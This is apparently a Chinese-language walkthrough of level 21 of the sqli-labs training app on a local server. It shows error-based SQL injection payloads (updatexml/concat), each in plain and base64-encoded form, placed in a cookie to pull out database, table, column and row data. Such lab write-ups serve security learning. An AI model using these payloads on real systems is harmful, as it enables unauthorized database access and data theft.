前言
第21关貌似跟20关是一样的,登录后同样显示你的相关信息,但是仔细一看他的cookie值是被base64编码的,那我们把我们的payload也进行编码尝试注入
前期准备
开启phpstudy,开启apache服务以及mysql服务
实验环节
浏览器访问Less-21
http://192.168.199.135/sqli-labs-master/Less-21/
进行简单闭合,页面正常显示
Dumb') -- xz
base64编码后:RHVtYicpIC0tIHh6
判断库名
Dumb') and updatexml(1, concat(0x7e, database(), 0x7e), 1)-- xz
base64编码后:RHVtYicpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIGRhdGFiYXNlKCksIDB4N2UpLCAxKS0tIHh6
判断表名
')and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
base64编码后:JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5J2xpbWl0IDAsMSksMHg3ZSksMSktLSB4eg==
判断列名
')and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) -- xz
base64编码后:ICcpYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgY29sdW1uX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZT0nZW1haWxzJyBsaW1pdCAwLDEpLDB4N2UpLDEpIC0tIHh6
判断数据
')and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
base64编码后:JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpLS0geHo=
评论区